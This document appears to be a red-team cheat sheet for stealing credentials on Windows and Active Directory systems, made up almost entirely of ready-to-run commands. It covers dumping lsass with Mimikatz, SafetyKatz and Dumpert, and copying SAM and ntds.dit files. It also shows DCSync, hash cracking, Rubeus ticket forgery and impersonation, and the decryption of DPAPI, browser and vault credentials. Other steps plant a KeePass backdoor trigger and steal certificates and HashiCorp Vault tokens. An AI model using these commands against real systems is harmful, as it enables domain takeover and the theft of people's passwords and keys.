Enable SMB shares for local admin users
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-service LanmanServer | restart-service -verbose
Find credentials in files
Get-ChildItem -path C:\Windows\Repair\* -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\Windows\System32\config\RegBack\* -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\* -include *.SAM*,*.SYSTEM* -force -Recurse
Check registery for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Find autologon credentials registery key
Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"
Look for unattend and sysprep files
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\Panther\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\system32\* -Recurse -Include *sysgrep.xml*, *sysgrep.inf*
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*, *sysgrep.xml*, *sysgrep.inf*
Get powershell history path and cat history
Get-PSReadlineOption
cat <path>
Look for powershell history files
Get-Childitem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue
Look for hardcoded passwords in scripts
Get-ChildItem -path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "password"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "creds"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path "C:\Users\*" -Recurse -Include *accessTokens.json*, *TokenCache.dat*, *AzureRmContext.json*
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
Get-ChildItem C:\users\ -Recurse -include *keytab* -erroraction silentlycontinue
Get-ChildItem C:\ -Recurse -include *keytab* -erroraction silentlycontinue
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy
Invoke-MimiKatz -DumpCreds
Dump credentials on a local machine using Mimikatz.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys"
Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).
SharpKatz.exe --Command ekeys
Dump credentials using Dumpert (Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
Using pypykatz (Mimikatz functionality in Python)
Find lsass process in details tab
Right click and select create dump file
Get-Process lsass
rundll32.exe C:\windows\System32\comsvc.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
reg save HKLM\SAM SamBkup.hiv /Y
reg save HKLM\System SystemBkup.hiv /Y
reg save HKLM\Security SecurityBkup.hiv /Y
mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv SecurityBkup.hiv
Copy-Item C:\Windows\system32\config\SYSTEM <PATH>
Copy-Item C:\Windows\ntds\ntds.dit <PATH>
unblock-file DSInternals_v4.7.zip
expand-archive DSInternals_v4.7.zip -DestinationPath C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals
$key = Get-BootKey -SystemHiveFilePath <PATH TO SYSTEM>
Get-ADDBAccount -all BootKey $key -DBPath <PATH TO ntds.dit>
Get-ADDBAccount -samaccountname administrator -BootKey $key -DBPath <PATH TO ntds.dit>
Create shadowcopy of the C:\ drive
wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Copy the NTDS.dit, SYSTEM and SECURITY hives
wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"
$creds = Get-Credential
New-PSDrive -Credential $creds -Name j \\<DC FQDN>\c$\temp -PSProvider FileSystem
Extract credentials
python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local
If you set usernames in the file use with <USERNAME:<HASH>
format. Use --Username
Format 5b184274dcba7bfd289e8a4f439676a4
.\hashcat.exe -a 0 -m 1000 .\hast.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
Format $DCC2$#user#7eb833ab3bddade058de4bc672debdde
.\hashcat.exe -a 0 -m 2100 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
Format admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
.\hashcat.exe -a 0 -m 5600 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
Mimikatz dump credentials on local machine
Invoke-Mimikatz -Dumpcreds
Mimikatz dump credentials on multiple remote machines
Invoke-Mimikatz -Dumpcreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME2>")
Mimikatz DCSync attack specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'
Mimikatz DCSync attack everything
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
Invoke-Mimikatz –DumpCerts
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'
Mimikatz dump all to find privs
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'
Use /outfile:
to save to file.
Use /nowrap
for easier copying of ticket
use /ptt
to inject in current session
.\Rubeus.exe asktgt /user:<USER> /password:<PASSWORD> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<BASE64 TGT> /service:<CIFS>/<FQDN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<TGT FILE KIRBI> /service:<CIFS>/<FQDN> /ptt
./Rubeus.exe triage
./Rubeus.exe dump /luid:<ID> /service:<SERVICE> /nowrap
[System.IO.File]::WriteAllBytes("C:\Users\public\ticket.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))
./Rubeus.exe describe /ticket:<TICKET FILE>
.\Rubeus.exe /ticket:<TICKET BASE64> /ptt
.\Rubeus.exe /ticket:<FILE TO KIRBI FILE> /ptt
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Gain access to a domain computer if we have its RC4, AES256 or TGT.
There are means of obtaining a TGT for a computer without already having local admin access to it, such as pairing the Printer Bug and a machine with unconstrained delegation, NTLM relaying scenarios and Active Directory Certificate Service abuse
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:<LUID> /service:krbtgt
Check for user to impersonate
Get-DomainUser | ? {!($_.memberof -Match "Protected Users")} | select samaccountname, memberof
Impersonate any user except those in groups "Protected Users" or accounts with the "This account is sensitive and cannot be delegated" right.
Make sure they are local admin on the target machine.
.\Rubeus.exe s4u /impersonateuser:<USER> /self /altservice:cifs/<COMPUTER FQDN> /user:<COMPUTERNAME>$ /ticket:<TGT TICKET> /nowrap
.\Rubeus.exe /ticket:<TICKET BASE64> /ptt
.\Rubeus.exe /ticket:<FILE TO KIRBI FILE> /ptt
Execute ls on the computer
ls \\<COMPOTERNAME FQDN>\C$
Unprotect pfx file for authentication certipy
certipy cert -export -pfx "cert.pfx" -password "<PASSWORD>" -out "cert-unprotected.pfx"
Use the NTLM hash or .ccache
file for authentication
certipy auth -pfx "cert-unprotected.pfx" -dc-ip <DC IP>
List all tokens on a machine
Invoke-TokenManipulation –ShowAll
List all unique, usable tokens on the machine
Invoke-TokenManipulation -Enumerate
Start a new process with token of a specific user
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
Start news process with token of another process
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500
Get key from saved wifi network
netsh wlan show profiles name=<NAME> key=clear
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials" /all
vaultcmd /listcreds:"Web Credentials" /all
./Seatbelt.exe WindowsVault
./Seatbelt.exe WindowsCredentialFiles
Read creds with credz.txt
python3 DonPAPI.py -credz credz.txt <DOMAIN>/<USER>:<PASSWORD>@<IP>
Retrieve backup key with DA
python3 dpapi.py backupkeys --export -t <DOMAIN>/<USER>:<PASSWORD>@<IP>
Read all creds with backup key
python3 DonPAPI.py -pvk domain_backupkey.pvk <DOMAIN>/<USER>:<PASSWORD>@<IP>
List vault of the current user
Invoke-Mimikatz -Command '"vault::list"'
Can be in Roaming or Local for all commands!
ls C:\Users\<USER>\AppData\Local\Microsoft\Credentials -Hidden
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials -Hidden
./Seatbelt.exe WindowsCredentialFiles
Find master encryption key ID
The pbData
field contains the encrypted data and the guidMasterKey
contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<BLOB ID>"'
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID> -Hidden
Get master encryption key
Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /rpc"
Get master encryption keys from memory
If not recently used it won't be in memory
Invoke-Mimikatz -Command '"sekurlsa::dpapi"'
Get MasterKey with User's Password
Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /sid:<USER SID> /password:<PASSWORD> /protected
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'
Invoke-Mimikatz -Command '"dpapi::cred /patch"'
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
Find master encryption key ID
The pbData
field contains the encrypted data and the guidMasterKey
contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID>"'
mimikatz !sekurlsa::dpapi
Invoke-Mimikatz -Command '"mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>
A non-null Login Data file is a good indication that credentials are saved in here
ls "$env:LOCALAPPDATA\google\chrome\USERDA~1\default\"
ls C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default
.\SharpChromium.exe logins
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /masterkey:<KEY>
type %APPDATA%\KeePass\KeePass.config.xml
tasklist | findstr /I keepass
dir /s "C:/" | findstr "KeePass"
Get-Process keepass
Get-KeePassDatabaseKey -Verbose
Create backdoor in config
Find-KeePassconfig -Path $env:appdata\KeePass
Get-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose
Add-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose -ExportPath C:\users\public\
keepass2john Passwords.kdbx > hash.txt
hashcat -m 13400 -a 0 hash.txt rockyou.txt -r dive.rule
sudo apt install putty-tools
puttygen privkey.ppk -O private-openssh -o priv_key
proxychains ssh -i priv_key <USER>@<IP>
Start netsh packet capture
netsh trace start capture=yes
Transform the .etl file to pcap file
.\etl2pcapng.exe NetTrace.etl capture.pcapng
Open the pcap in prefered tool such as WireShark
Check for virtual disks on the system
Get-Childitem -Path C:\Users\* -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\ -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get the VHDX location of VM
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD | Select-Object Path
Mount-VHD -Path "<PATH TO VHDX>" -PassThru
Get-Disk | Get-Partition | Get-Volume
Copy senstive files and extract credentials
From SAM or ntds.dit example.
copy-item D:\Windows\system32\config\SAM C:\users\public\
copy-item D:\Windows\system32\config\SECURITY C:\users\public\
copy-item D:\Windows\system32\config\SYSTEM C:\users\public\
copy-item D:\Windows\ntds\ntds.dit C:\users\public\
Dismount-VHD -Path "<PATH TO VHDX>"
Resetting a password remotely
smbpasswd.py <DOMAIN>/<USER>:<PASSWORD>@<DC> -newpass '<NEW PASSWORD>'
Requires RDP without NLA enforced
Login and will request to reset password
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
.\changepw.exe /d:<DOMAIN> /u:<USER> /o:<PASSWORD OLD> /p:<PASSWORD NEW>
Active Directory Certificate Services
# Current user store
certutil -user -store My
# Machine store
certutil -store My
# Current user store
.\CertifyKit.exe list
# Machine store
.\CertifyKit.exe list /storename:my /storelocation:localmachine
# User store
Get-ChildItem Cert:\CurrentUser\My -Recurse
Get-ChildItem Cert:\CurrentUser\ -Recurse
# Machine store
Get-ChildItem Cert:\LocalMachine\My -Recurse
Get-ChildItem Cert:\LocalMachine\ -Recurse
certutil -p <PASSWORD> -exportpfx <SERIAL ID> cert.pfx
Use /base64
to exfil in base64 encoded file
.\CertifyKit.exe list /certificate:<SERIAL ID> /outfile:cert.pfx
.\CertifyKit.exe list /storename:my /storelocation:localmachine /certificate:<SERIAL ID> /outfile:cert.pfx
$mypwd = ConvertTo-SecureString -String "<PASSWORD>" -Force -AsPlainText
Export-PfxCertificate -Cert Cert:\LocalMachine\My\<SERIAL ID> -FilePath cert.pfx -Password $mypwd
If CAPI or CNG APIs are configured to block the private key export and not allow extraction of non-exportable certificates, Use Mimikatz to export private keys
.\Mimikatz.exe "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"
.\BetterSafetyKatz.exe -args "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"
THEFT2 Get User Certificate DPAPI
User certificates stored in:
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificate
Disk: %APPDATA%\Microsoft\SystemCertificates\My\Certificate
User private keys:
CAPI keys %APPDATA%\Microsoft\Crypto\RSA\User SID
CNG keys %APPDATA%\Microsoft\Crypto\Keys\
SharpDPAPI find certificates
.\SharpDPAPI.exe certificates
SharpDPAPI Dump certificates using password
.\SharpDPAPI.exe certificates /password:<PASSWORD>
Mimikatz Dump in users context
dpapi::masterkey /in:"<PATH TO KEY>" /rpc
Mimikatz Dump using the password
dpapi::masterkey /in:"<PATH TO KEY>" /sid:<USER SID> /password:<PASSWORD>
SharpDPAPI decrypt masterkeys using domain backup key
.\SharpDPAPI.exe certificates /pvk:<KEY>
Convert Pem to PFX with openssl
Save the private key and cert to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Add /getcredentials
to also retrieve the NTLM hash
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
THEFT3 Machine Certificate DPAPI
SharpDPAPI Dump machine certificates
.\SharpDPAPI.exe certificates /machine
Mimikatz Dump machine certificates
lsadump::secrets
crypto::certificates /export /systemstore:LOCAL_MACHINE
THEFT4 Certificates on disk
Locate certificates and private key on disk
dir C:\*.pfx C:\*.pem C:\*.p12 C:\*.crt C:\*.cer C:\*.p7b C:\*.ovpn /s /b
Get-ChildItem C:\ -include ('*.pem', '*.pfx', '*.p12', '*.crt', '*.cer', '*.key', '*.ovpn') -recurse -erroraction 'silentlycontinue'
.\Seatbelt.exe --group=InterestingFiles
certutil -dump -v <PATH TO CERT>
dir C:\*.ovpn /s /b
Get-ChildItem C:\ -include ('*.ovpn') -recurse -erroraction 'silentlycontinue'
HashiCorp can be used to store secrets such as certificates https://www.vaultproject.io/
Vault uses a technique called key sharing to split the master encryption key into multiple parts (minimum 2), known as unseal keys. All keys are required to unlock the vault.
Once logged in, Vault provides an access token which is subject to access token policies. Vault Policies enforce ACLs over users to view, modify or update content on the HashiCorp vault.
Even with root access to the machine hosting HashiCorp vault the only way to compromise HashiCorp vault is through a valid token generated using a valid authentication method such as ldap, user-pass, tokens etc.
When authentication is done using the Vault CLI tool, a .vault-token
file is placed in the home directory of current user. If this token file is compromised for a high privileged vault user, it could be used to escalate privileges
sudo nmap -p 8200 <RANGE> -sV -sC -Pn -n
vault status -address=https://<IP>:8200
Get-ChildItem C:\Users\ -Recurse -Include '.vault-token' -Force
find / -name '.vault-token'
cat /root/.vault-token
Authenticate with vault token
vault login -address=https://<IP>:8200 -method=token <TOKEN>
vault login -address=https://<IP>:8200 -method=ldap username=<USERNAME>
Run multiple times for multiple keys
vault operator unseal -address=https://<IP>:8200
List all vault secrets and folders
vault secrets list -address=https://<IP>:8200
List kv secrets of folder
vault kv list -address=https://<IP>:8200 <FOLDER>
vault kv get -address=https://<IP>:8200 <FOLDER>/<SECRET>
Enumerate roles of folder
Check allowed_extensions
, allowed_users
and default_user
vault list -address=https://<IP>:8200 <FOLDER>/roles
vault read -address=https://<IP>:8200 <FOLDER>/roles/<ROLE>
Use the public key of a user
Save signed public key
vault write -address=-address=https://<IP>:8200 -field=signed_key ssh-client-signer/sign/<ROLE> public_key=@'<PATH TO PUBLIC KEY>'
ssh -i <PATH TO SIGNED PUBLIC KEY> -i <PATH TO PRIVATE KEY> <USER>@<TARGET>
Linux uses /etc/ssl
directories or flat NSS SQLite database files to store certificates.
On Linux, certutil and pk12util are two tools that can be used to manage private keys and certificates using NSS databases and NSS tokens.
We can use certutil to view and initialize a NSS database for certificate storage.
certutil -d $HOME/.pki/nssdb -N
pk12util -i internaluser.p12 -d $HOME/.pki/nssdb
certutil -L -d <FILE TO nssdb>
certutil -L -d <FILE TO nssdb> -a -n "<CERT NICKNAME>"
certutil -K -d <FILE TO nssdb>
Export cert and private key
pk12util -o certandkey.pfx -n "<CERT NICKNAME>" -d <FILE TO nssdb>
certutil -v -dump -p <PASSWORD> <PATH TO PFX>
.\Rubeus.exe asktgt /user:<USER> /certificate:certandkey.p12 /domain:<DOMAIN> /ptt
Pass the certificate Request TGT
Add /getcredentials
to also retrieve the NTLM hash (Unpac the hash attack)
Possible to use /certficiate
and base64 output
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
certipy auth -pfx '<PATH TO cert.pfx>'
.\Rubeus.exe asktgt /getcredentials /user:<COMPUTERACCOUNT>$ /certificate:<PATH TO PFX> /password:<PASSWORD OF PFX> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /show
certipy auth -pfx '<PATH TO cert.pfx>' -dc-ip <DC IP>
EFS can be used to encrypt files. An EFS certificate is required to be imported into the current user's certificate store and permission to modify the target file is required.
A recovery agent is required to read or recover data encrypted using EFS - The default DA is a recovery agent in a domain
Microsoft details two methods to perform decryption operations:
Retrieve the original EFS certificate used to encrypt the file and import it in the target computer certificate store.
Use an EFS DRA certificate to restore an EFS encrypted file if the original EFS certificate used to encrypt the file is lost.
/h
Displays files with hidden or system attributes. By default, these files are not encrypted or decrypted.
/u /n
Finds all encrypted files on the local drive(s). If used with the /n parameter, no updates are made.
Check .pfx file for EFS EKU
Check for EKU
Encrypting File System certificates
(1.3.6.1.4.1.311.10.3.4
) This type of certificate uses EFS to encrypt and decrypt data and is called as an EFS certificate.
File Recovery certificates
(1.3.6.1.4.1.311.10.3.4.1:)
This type of certificate allows to recover all encrypted files and folders (domain or offline) no matter who encrypted them and is called as an EFS DRA (Data Recovery Agent) certificate.
certutil -v -dump -p <PASSWORD> <PATH TO PFX>
.\CertifyKit.exe list /certificate:<PATH TO EFS .pfx> /storename:My /install
.\CertifyKit.exe list
.\CertifyKit.exe list /certificate:<FINGERPRINT> /storename:My /remove